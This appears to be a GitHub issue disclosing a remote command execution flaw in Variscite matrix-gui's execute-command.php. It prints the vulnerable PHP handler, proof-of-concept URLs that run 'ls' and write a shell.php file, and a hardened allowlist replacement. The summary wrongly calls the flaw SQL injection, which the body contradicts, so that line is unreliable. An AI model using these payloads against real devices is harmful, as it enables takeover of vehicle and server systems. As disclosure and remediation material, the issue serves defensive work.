CVE-2023-26922: execute-command.php Command execution vulnerability · Issue #1 · varigit/matrix-gui-v2
SQL injection vulnerability found in Variscite matrix-gui v.2 allows a remote attacker to execute arbitrary code via the shell_exec parameter to the \www\pages\matrix-gui-2.0 endpoint.
The execute-command.php file is located in the \www\pages\matrix-gui-2.0 directory of the firmware.
Vulnerability type: command execution
This source code is used in the T-Box of an Internet of Vehicles system, which can control the vehicle's central controller, so the issue is very dangerous.
```php
<?php
// User-controlled GET parameter is passed straight to the shell
$command = $_GET['command'];
$output = shell_exec($command);
echo $output;
?>
```
`shell_exec` runs the string it is given as a shell command, and that string is taken directly from the `command` GET parameter, so the executed content is fully attacker-controlled.
Vulnerability exploitation process:
The `command` parameter is passed via GET to `shell_exec`, which executes it and returns the output, which the script then echoes back.
POC:
```
/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php
```
Example:
```
http://192.168.160.128:7777/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php
```
To sum up, the device has a remote command execution vulnerability: anyone who can reach this endpoint can run arbitrary commands and thereby obtain control of the server.
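For comparison, the following is an added hardened replacement for the handler (example code written for this issue, not part of the matrix-gui project). It assumes PHP 7.4 or later, so that `proc_open` can take an argv array and bypass the shell entirely, and it assumes the GUI only needs a small fixed set of actions; the action names and binary paths are placeholders.

```php
<?php
// Hardened execute-command.php (added example, not the project's code).
// Assumes PHP >= 7.4 (array form of proc_open) and a fixed set of actions.

// Allowlist: the client picks an action name; the command line is never
// built from user input. Paths are assumed for illustration.
const ALLOWED_ACTIONS = [
    'uptime'   => ['/usr/bin/uptime'],
    'disk'     => ['/bin/df', '-h'],
    'network'  => ['/sbin/ifconfig'],
];

function run_action(string $action): ?string
{
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        return null; // unknown action: refuse instead of interpolating input
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    // Array argv goes straight to execve(); no /bin/sh parses it, so
    // metacharacters such as ; | > & in the request cannot change what runs.
    $proc = proc_open(ALLOWED_ACTIONS[$action], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// This endpoint should additionally sit behind the GUI's authentication;
// the allowlist limits damage but does not replace access control.
header('Content-Type: text/plain; charset=utf-8');
$action = $_GET['action'] ?? '';
$output = run_action($action);
if ($output === null) {
    http_response_code(400);
    echo "unsupported action\n";
} else {
    echo $output;
}
```

With this shape, a request such as `?action=disk;id` fails the allowlist lookup and returns HTTP 400 rather than reaching any shell.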